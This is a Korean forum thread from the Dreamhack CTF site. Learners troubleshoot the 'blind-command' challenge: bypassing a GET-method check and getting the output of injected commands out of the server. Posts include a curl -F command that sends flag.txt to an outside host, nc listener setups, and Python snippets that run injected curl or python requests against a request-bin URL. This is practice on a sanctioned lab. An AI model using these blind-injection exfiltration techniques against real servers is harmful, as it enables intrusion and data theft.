blind-command

curl -F "filename=flag.txt" http://ip:port 이거 동작이 안 되는데 다른 방법이 있나요? 이 문제 curl -d 옵션은 됨

post로 날려야 커맨드가 실행을 해서 아래와 같이 파이썬으로 작성을 해서 날렸는데 405 에러가 나네요. 다른 문제에서는 됐었는데요.... import requests url = "http://host1.dreamhack.games:12584" res = requests.post(url, data={'cmd':'ls'}) print (res.text) post로 날리려면 어떻게 해야 하나요? 혹시 제가 처음부터 방향성을 잘못 잡고 있는 것인지요?? @.@ 다른 질문들을 읽어봐도.... 어뜨케 하는 건지 도통 모르겠네요. ㅠ.ㅠ 커맨드 실행을 해야 뭐라도 할텐데... 흠..... 왕초보

답을 풀고 나니 너무 많은 힌트를 유출한것 같아서 질문을 삭제했습니다. 일단은 강의 내용중 실행 결과를 확인할 수 없는 환경 을 잘 보시고 그걸 적용하기 전에는 어떤 방식으로 적용해야 할지는 다른 질문들을 참고하시면 되겠습니다. 헐~ 평소 잘 사용 안하는 것들이라서 어려웠는데, 풀고나니... 그리 어렵지 않네요. ㅎㅎㅎ

서버에 호스트 ip(공인ip):8080 로 nc툴써서 ls 명령어 보내게 하고 호스트에서 nc로 리슨하게 했는데 반응이 전혀없네요..ㅠㅠ 강의보고 한건데 왜 안되는지 잘모르겠습니다 도움 부탁드려요

host1.dreamhack.games:23376으로 접속을 했는데 ?cmd=[cmd]이렇게만 뜨는데 이게 맞나요?

get method 우회 방법좀 부탁드립니다.

포트포워딩은 할줄모르고 따른 쉬운방법으로 명령어 결과 나오게 할수 없을까여 ㅠㅠㅠ

nc를 써보든 curl을 써보든 메소드 우회해서 입력하는데 반응이 안오네요.. 똑같이 직접 서버 실행해서 해보면 잘되는데 왜 이럴까요? 힌트라도 주시면 감사하겠습니다.

서버에서 실행하는 system 명령어(os.system(cmd))에 대한 결과를 확인하기 위해 curl과 python을 이용하여 두개의 요청을 보냈습니다! 그런데 python으로 한 요청의 결과 값이 오지 않는 이유를 모르겠습니다... S_METHOD에는 GET 메소드 대신 사용할 메소드가 들어갔습니다. cmd1을 통한 요청의 응답은 오지 않았고, cmd2를 통한 요청은 응답이 왔습니다 import requests import os link = "https://vmtpmuf.request.dreamhack.games" cmd1 = f"python -c 'import requests; requests.get(\"{link}\")'" cmd2 = "curl -v 'https://vmtpmuf.request.dreamhack.games'" if name == "main": chall_port = int(sys.argv[1]) chall_url = f"http://host1.dreamhack.games:{chall_port}/?cmd={cmd}" #print(cmd) #print(chall_url) #os.system(cmd) response = requests.S_METHOD(chall_url) `

윈도우용 nc 받아서 -l -p 1234로 서버 띄우고 파일 내용은 일단 접어두고 응답 오는지 보려고 하는데 답이 안오네요. 공유기에서 포트포워딩 설정도 했고 메소드는 head부터 다 날려봤습니다. 답이 없으니 답답하네요. 그러니 blind-command겠습니다만. 그리고 드림핵 툴즈 서비스를 이용하면 쉽다는 말씀도 있던데 사용법 같은 게 있을까요? 하수를 위해 조언부탁드립니다.